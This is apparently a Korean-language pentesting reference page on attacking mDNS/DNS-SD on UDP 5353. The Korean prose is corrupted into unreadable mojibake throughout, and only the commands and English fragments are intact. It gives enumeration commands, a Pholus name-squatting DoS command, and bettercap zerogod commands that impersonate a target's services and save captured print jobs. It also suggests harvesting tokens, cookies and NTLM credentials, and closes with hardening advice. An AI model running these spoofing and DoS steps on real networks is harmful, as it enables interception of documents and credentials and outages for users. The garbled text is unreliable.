5353/UDP Multicast DNS (mDNS) and DNS-SD
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ธฐ๋ณธ ์ ๋ณด
Multicast DNS (mDNS)๋ ์ ๋์บ์คํธ DNS ์๋ฒ ์์ด ๋ก์ปฌ ๋งํฌ ๋ด์์ DNS์ ์ ์ฌํ ์ด๋ฆ ํด์๊ณผ ์๋น์ค ๊ฒ์์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค. ์ด ํ๋กํ ์ฝ์ UDP/5353๊ณผ ๋ฉํฐ์บ์คํธ ์ฃผ์ 224.0.0.251 (IPv4) ๋ฐ FF02::FB (IPv6)๋ฅผ ์ฌ์ฉํฉ๋๋ค. DNS Service Discovery (DNS-SD, ์ผ๋ฐ์ ์ผ๋ก mDNS์ ํจ๊ป ์ฌ์ฉ๋จ)๋ PTR, SRV ๋ฐ TXT ๋ ์ฝ๋๋ฅผ ํตํด ์๋น์ค๋ฅผ ์ด๊ฑฐํ๊ณ ์ค๋ช ํ๋ ํ์คํ๋ ๋ฐฉ๋ฒ์ ์ ๊ณตํฉ๋๋ค.
PORT STATE SERVICE
5353/udp open zeroconf
๊ณต๊ฒฉ์์ ์์ฃผ ํ์ฉํ ์ฃผ์ ํ๋กํ ์ฝ ์ธ๋ถ์ฌํญ:
- .local ์กด์ ์ด๋ฆ์ mDNS๋ฅผ ํตํด ํด์๋ฉ๋๋ค.
- QU (Query Unicast) ๋นํธ๋ ๋ฉํฐ์บ์คํธ ์ง๋ฌธ์๋ unicast ์๋ต์ ์์ฒญํ ์ ์์ต๋๋ค.
- ๊ตฌํ์ฒด๋ ๋ก์ปฌ ๋งํฌ์์ ์ถ๋ฐํ์ง ์์ ํจํท์ ๋ฌด์ํด์ผ ํ์ง๋ง, ์ผ๋ถ ์คํ์ ์ฌ์ ํ ์ด๋ฅผ ์๋ฝํฉ๋๋ค.
- Probing/announcing์ ํธ์คํธ/์๋น์ค ์ด๋ฆ์ ๊ณ ์ ์ฑ์ ๊ฐ์ ํฉ๋๋ค; ์ฌ๊ธฐ์ ๊ฐ์ญํ๋ฉด DoS/โname squattingโ ์ํ๋ฅผ ๋ง๋ค ์ ์์ต๋๋ค.
DNS-SD ์๋น์ค ๋ชจ๋ธ
์๋น์ค๋ .local ์๋์์ _
๋คํธ์ํฌ ํ์ ๋ฐ ์ด๊ฑฐ
- nmap ๋์ ์ค์บ (ํธ์คํธ์์ ์ง์ mDNS):
nmap -sU -p 5353 --script=dns-service-discovery <target>
- nmap ๋ธ๋ก๋์บ์คํธ ๋ฐ๊ฒฌ (์ธ๊ทธ๋จผํธ๋ฅผ ๋ฆฌ์ค๋ํ์ฌ ๋ชจ๋ DNS-SD ํ์ /์ธ์คํด์ค ์ด๊ฑฐ):
sudo nmap --script=broadcast-dns-service-discovery
- avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
- Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
- Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
ํ: ์ผ๋ถ ๋ธ๋ผ์ฐ์ /WebRTC๋ ๋ก์ปฌ IP๋ฅผ ์๋ํ๊ธฐ ์ํด ์ผ์์ mDNS ํธ์คํธ๋ช ์ ์ฌ์ฉํฉ๋๋ค. ๋คํธ์ํฌ์์ random-UUID.local ํ๋ณด๋ฅผ ๋ณด๋ฉด, mDNS๋ก ํด์ํ์ฌ ๋ก์ปฌ IP๋ก ํผ๋ฒํ์ธ์.
๊ณต๊ฒฉ
mDNS ์ด๋ฆ probing ๊ฐ์ญ (DoS / name squatting)
ํ๋ก๋น ๋จ๊ณ์์ ํธ์คํธ๋ ์ด๋ฆ์ ๊ณ ์ ์ฑ์ ํ์ธํฉ๋๋ค. ์คํธํ๋ ์ถฉ๋๋ก ์๋ตํ๋ฉด ํธ์คํธ๋ ์ ์ด๋ฆ์ ์ ํํ๊ฑฐ๋ ์คํจํ๊ฒ ๋ฉ๋๋ค. ์ด๋ ์๋น์ค ๋ฑ๋ก ๋ฐ ๊ฒ์์ ์ง์ฐ์ํค๊ฑฐ๋ ์ฐจ๋จํ ์ ์์ต๋๋ค.
Example with Pholus:
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
์๋น์ค ์คํธํ ๋ฐ ์ฌ์นญ (MitM)
๊ด๊ณ ๋๋ DNS-SD ์๋น์ค๋ฅผ(ํ๋ฆฐํฐ, AirPlay, HTTP, ํ์ผ ๊ณต์ )๋ฅผ ์ฌ์นญํ์ฌ ํด๋ผ์ด์ธํธ๋ฅผ ๋น์ ์๊ฒ ์ฐ๊ฒฐ๋๋๋ก ์ ๋ํ์ธ์. ํนํ ๋ค์์ ์ ์ฉํฉ๋๋ค:
- ๋ฌธ์๋ฅผ ์บก์ฒํ๋ ค๋ฉด _ipp._tcp ๋๋ _printer._tcp๋ฅผ spoofingํ์ธ์.
- ํด๋ผ์ด์ธํธ๋ฅผ HTTP/HTTPS ์๋น์ค๋ก ์ ๋ํ์ฌ tokens/cookies๋ฅผ ์์งํ๊ฑฐ๋ payloads๋ฅผ ์ ๋ฌํ์ธ์.
- Windows ํด๋ผ์ด์ธํธ๊ฐ auth๋ฅผ ํ์ํ ๋ NTLM relay techniques์ ๊ฒฐํฉํ์ฌ spoofed services๋ฅผ ์ด์ฉํ์ธ์.
With bettercapโs zerogod module (mDNS/DNS-SD spoofer/impersonator):
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Show full DNS records for a host (newer bettercap)
> zerogod.show-full 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
์ต๊ทผ ๊ตฌํ ๋ฌธ์ ๋ฉ๋ชจ (์ค๋ฌด์์ DoS/์ง์์ฑ์ ์ ์ฉ)
- Avahi reachable-assertion ๋ฐ D-Bus crash ๋ฒ๊ทธ(2023)๋ Linux ๋ฐฐํฌํ์์ avahi-daemon์ ์ข ๋ฃ์์ผ(์: CVE-2023-38469..38473, CVE-2023-1981) ์ฌ์์ ์ ๊น์ง ๋์ ํธ์คํธ์ ์๋น์ค ๊ฒ์์ ์ค๋จ์ํฌ ์ ์์ต๋๋ค.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303)๋ ์ธ์ ํ WLAN ํด๋ผ์ด์ธํธ๊ฐ ์กฐ์๋ mDNS๋ฅผ ๋๋ ์ ์กํ๋๋ก ํ์ฌ WLC CPU ์ฌ์ฉ๋์ ๊ธ์ฆ์ํค๊ณ AP ํฐ๋์ ๋๊ฒ ๋ง๋ค ์ ์์ต๋๋ค โ ์ค๋ฌด์์ ํด๋ผ์ด์ธํธ ๊ฐ์ ๋ก๋ฐ์ด๋ ์ปจํธ๋กค๋ฌ ๋ฆฌ์ ์ด ํ์ํ ๋ ์ ์ฉํฉ๋๋ค.
- Apple mDNSResponder logic error DoS (CVE-2024-44183)๋ ์๋๋ฐ์ค๋ ๋ก์ปฌ ํ๋ก์ธ์ค๊ฐ Bonjour๋ฅผ ํฌ๋์์์ผ Apple ์๋ํฌ์ธํธ์์ ์๋น์ค ๊ฒ์/์กฐํ๊ฐ ์ ์ ์ค๋จ๋๊ฒ ํ ์ ์์ต๋๋ค; ํ์ฌ iOS/macOS ๋ฆด๋ฆฌ์ค์์ ํจ์น๋์์ต๋๋ค.
- Apple mDNSResponder correctness issue (CVE-2025-31222)์ mDNSResponder๋ฅผ ํตํ ๋ก์ปฌ ๊ถํ ์์น์ ํ์ฉํ์ผ๋ฉฐ, ๊ด๋ฆฌ๋์ง ์๋ Mac/iPhone์์ ์ง์์ฑ ํ๋ณด์ ์ ์ฉํ์ต๋๋ค; ์ต๊ทผ iOS/macOS ์ ๋ฐ์ดํธ์์ ์์ ๋์์ต๋๋ค.
Browser/WebRTC mDNS ๊ณ ๋ ค์ฌํญ
๋ชจ๋ Chromium/Firefox๋ ํธ์คํธ ํ๋ณด๋ฅผ ๋ฌด์์ mDNS ์ด๋ฆ์ผ๋ก ๋๋
ํํฉ๋๋ค. Chrome ์ ์ฑ
WebRtcLocalIpsAllowedUrls๋ฅผ ๋ฐ์ด๋ฃ๊ฑฐ๋(chrome://flags/#enable-webrtc-hide-local-ips-with-mdns/Edge ๋๋ฑ ์ต์
์ ํ ๊ธ) ICE๊ฐ mDNS ๋์ ํธ์คํธ ํ๋ณด๋ฅผ ๋
ธ์ถํ๋๋ก ํ๋ฉด ๊ด๋ฆฌ๋๋ ์๋ํฌ์ธํธ์์ LAN IP๋ฅผ ๋ค์ ๋
ธ์ถ์ํฌ ์ ์์ต๋๋ค; ์ค์ ์ HKLM\Software\Policies\Google\Chrome๋ฅผ ํตํด ์ ์ฉ๋ฉ๋๋ค.
์ฌ์ฉ์๊ฐ ์๋์ผ๋ก ๋ณดํธ ๊ธฐ๋ฅ์ ๋นํ์ฑํํ๋ฉด(์นRTC ๋ฌธ์ ํด๊ฒฐ ๊ฐ์ด๋์์ ํํจ) ๋ธ๋ผ์ฐ์ ๊ฐ ๋ค์ ์ผ๋ฐ ํธ์คํธ ํ๋ณด๋ฅผ ๊ด๊ณ ํ๊ธฐ ์์ํ๊ณ , ์ด๋ mDNS ๋๋ ICE ์๊ทธ๋๋ง์ ํตํด ์บก์ฒํ์ฌ ํธ์คํธ ๋ฐ๊ฒฌ์ ๊ฐ์ํํ ์ ์์ต๋๋ค.
๋ฐฉ์ด ๊ณ ๋ ค์ฌํญ ๋ฐ OPSEC
- ์ธ๊ทธ๋จผํธ ๊ฒฝ๊ณ: mDNS gateway๊ฐ ๋ช ์์ ์ผ๋ก ํ์ํ ๊ฒฝ์ฐ๋ฅผ ์ ์ธํ๊ณ 224.0.0.251/FF02::FB๋ฅผ ๋ณด์ ์กด ๊ฐ์ ๋ผ์ฐํ ํ์ง ๋ง์ธ์. discovery๋ฅผ ๋ธ๋ฆฌ์งํด์ผ ํ๋ค๋ฉด ํ์ฉ ๋ชฉ๋ก๊ณผ ์๋ ์ ํ์ ์ฐ์ ์ฌ์ฉํ์ธ์.
- Windows ์๋ํฌ์ธํธ/์๋ฒ:
- mDNS๋ฅผ ํตํ ์ด๋ฆ ํด์์ ์์ ํ ๋นํ์ฑํํ๋ ค๋ฉด ๋ ์ง์คํธ๋ฆฌ ๊ฐ์ ์ค์ ํ๊ณ ์ฌ๋ถํ ํ์ธ์:
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
- ๊ด๋ฆฌ๋๋ ํ๊ฒฝ์์๋ ๊ธฐ๋ณธ ์ ๊ณต๋๋ โmDNS (UDP-In)โ Windows Defender Firewall ๊ท์น(์ ์ด๋ ๋๋ฉ์ธ ํ๋กํ์ผ์์)์ ๋นํ์ฑํํ์ฌ ์์ mDNS ์ฒ๋ฆฌ๋ฅผ ๋ฐฉ์งํ๋ ํ/๋ก๋ฐ ๊ธฐ๋ฅ์ ์ ์งํ์ธ์.
- ์ต์ Windows 11 ๋น๋/GPO ํ ํ๋ฆฟ์์๋ ์ ์ฑ โComputer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocolโ์ ์ฌ์ฉํ๊ณ Disabled๋ก ์ค์ ํ์ธ์.
- Linux (Avahi):
- ํ์ํ์ง ์์ ๋๋ ํผ๋ธ๋ฆฌ์ฑ์ ์ ๊ทธ์ธ์:
/etc/avahi/avahi-daemon.conf์์disable-publishing=yes๋ก ์ค์ ํ๊ณallow-interfaces=/deny-interfaces=๋ก ์ธํฐํ์ด์ค๋ฅผ ์ ํํ์ธ์. check-response-ttl=yes๋ฅผ ๊ณ ๋ คํ๊ณ , ์๊ฒฉํ ํ์ํ์ง ์๋ค๋ฉดenable-reflector=yes๋ ํผํ์ธ์; ๋ฐ์ฌ(reflecting) ์์๋reflect-filters=ํ์ฉ ๋ชฉ๋ก์ ์ฌ์ฉํ๋ ๊ฒ์ด ์ข์ต๋๋ค.- macOS: ํน์ ์๋ธ๋ท์์ Bonjour ๊ฒ์์ด ํ์ํ์ง ์๋ค๋ฉด ํธ์คํธ/๋คํธ์ํฌ ๋ฐฉํ๋ฒฝ์์ ์์ mDNS๋ฅผ ์ ํํ์ธ์.
- ๋ชจ๋ํฐ๋ง:
_services._dns-sd._udp.local์ฟผ๋ฆฌ์ ๋น์ ์์ ๊ธ์ฆ์ด๋ ์ค์ํ ์๋น์ค์ SRV/TXT์ ๊ธ๊ฒฉํ ๋ณ๊ฒฝ์ด ๊ฐ์ง๋๋ฉด ๊ฒฝ๋ณด๋ฅผ ์ค์ ํ์ธ์; ์ด๋ ์คํธํ ๋๋ ์๋น์ค ์ฌ์นญ์ ์งํ์ ๋๋ค.
๋๊ตฌ ๋น ๋ฅธ ์ฐธ์กฐ
- nmap NSE:
dns-service-discoveryandbroadcast-dns-service-discovery. - Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
- bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).
Spoofing/MitM
์ด ์๋น์ค ์์์ ์ํํ ์ ์๋ ๊ฐ์ฅ ํฅ๋ฏธ๋ก์ด ๊ณต๊ฒฉ์ ํด๋ผ์ด์ธํธ์ ์ค์ ์๋ฒ ๊ฐ ํต์ ์์ MitM์ ์ํํ๋ ๊ฒ์
๋๋ค. ํ๋ฆฐํฐ์์ ํต์ ์ MitMํ์ฌ ๋ฏผ๊ฐํ ํ์ผ์ ํ๋ํ๊ฑฐ๋ Windows ์ธ์ฆ ๊ฐ์ ์๊ฒฉ์ฆ๋ช
์ ์ป์ ์ ์์ต๋๋ค.
์์ธํ ๋ด์ฉ์ ๋ค์์ ์ฐธ์กฐํ์ธ์:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
์ฐธ๊ณ ์๋ฃ
- Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things
- Nmap NSE: broadcast-dns-service-discovery
- bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)
- Cisco IOS XE WLC mDNS gateway DoS (CVE-2024-20303) advisory
- Rapid7 advisory for Apple mDNSResponder CVE-2024-44183
- Rapid7 writeup of Apple mDNSResponder CVE-2025-31222
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


